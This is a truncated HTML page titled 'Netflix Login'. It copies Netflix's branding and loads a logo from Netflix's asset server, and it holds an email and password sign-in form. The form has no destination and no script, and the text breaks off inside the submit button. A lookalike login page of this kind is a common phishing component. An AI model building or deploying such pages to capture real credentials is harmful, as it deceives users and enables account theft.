<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" href="../static/styles.css">
<style>
body {
    font-family: "Helvetica Neue", sans-serif;
    background-color: #000000;
}
.login-box {
background-color: #ffffff;
width: 400px;
margin: 50px auto;
padding: 20px;
border-radius: 5px;
box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
}

.logo {
background-image: url(https://assets.nflxext.com/ffe/siteui/login/images/FB-f-Logo__blue_57.png);
background-repeat: no-repeat;
background-size: contain;
height: 30px;
width: 120px;
margin: 0 auto;
}

h1 {
text-align: center;
margin-bottom: 20px;
font-size: 28px;
font-weight: normal;
}

label {
display: block;
margin-bottom: 10px;
font-size: 16px;
}

input[type="text"],
input[type="password"] {
display: block;
width: 100%;
padding: 10px;
margin-bottom: 20px;
border: none;
border-radius: 3px;
box-shadow: 0 0 5px rgba(0, 0, 0, 0.1);
font-size: 16px;
}

input[type="submit"] {
background-color: #e50914;
color: #ffffff;
border: none;
padding: 10px 20px;
border-radius: 3px;
font-size: 16px;
cursor: pointer;
transition: background-color 0.3s ease;
display: block;
margin: 0 auto;
}

input[type="submit"]:hover {
background-color: #b80d13;
}

input[type="checkbox"] {
display: inline-block;
margin-right: 10px;
}

.remember-me {
font-size: 14px;
margin-bottom: 20px;
}
</style>

<title>Netflix Login</title>
</head>
<body>
<div class="login-box">
    <div class="logo"></div>
    <h1>Sign In</h1>
    <form>
        <label for="email_phone">Email or Phone Number</label>
        <input type="text" id="email_phone" name="email_phone" required>
        <label for="password">Password</label>
        <input type="password" id="password" name="password" required>
        <div class="remember-me">
            <input type="checkbox" id="remember_me" name="remember_me">
            <label for="remember_me">Remember me</label>
        </div>
        <input type="submit" value="